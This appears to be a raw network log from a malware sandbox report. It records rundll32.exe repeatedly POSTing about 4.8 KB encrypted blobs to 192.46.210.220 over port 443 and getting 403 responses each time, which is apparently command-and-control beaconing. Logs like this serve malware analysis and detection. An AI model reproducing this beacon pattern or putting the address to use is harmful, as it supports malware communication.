                                                                                                        2021-10-28 02:53:25 UTC368OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:25 UTC372INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:25 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        75192.168.2.550091192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:27 UTC372OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:27 UTC372OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:28 UTC377INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:28 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        76192.168.2.550095192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:29 UTC377OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:29 UTC377OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:29 UTC382INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:29 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        77192.168.2.550099192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:31 UTC382OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:31 UTC382OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:32 UTC387INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:31 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        78192.168.2.550103192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:32 UTC387OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:32 UTC387OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:33 UTC392INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:33 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        79192.168.2.550107192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:35 UTC392OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:35 UTC392OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:35 UTC397INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:35 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        8192.168.2.549782192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:13 UTC39OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:13 UTC39OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:14 UTC44INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:14 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        80192.168.2.550111192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:36 UTC397OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:36 UTC397OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:37 UTC402INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:37 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        81192.168.2.550116192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:39 UTC402OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:39 UTC402OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:39 UTC407INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:39 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        82192.168.2.550119192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:40 UTC407OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:40 UTC407OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:41 UTC412INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:41 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        83192.168.2.550123192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:42 UTC412OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:42 UTC412OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:43 UTC417INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:43 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        84192.168.2.550127192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:44 UTC417OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:44 UTC417OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:45 UTC422INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:45 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        85192.168.2.550131192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:46 UTC422OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:46 UTC422OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:47 UTC427INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:47 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        86192.168.2.550135192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:48 UTC427OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
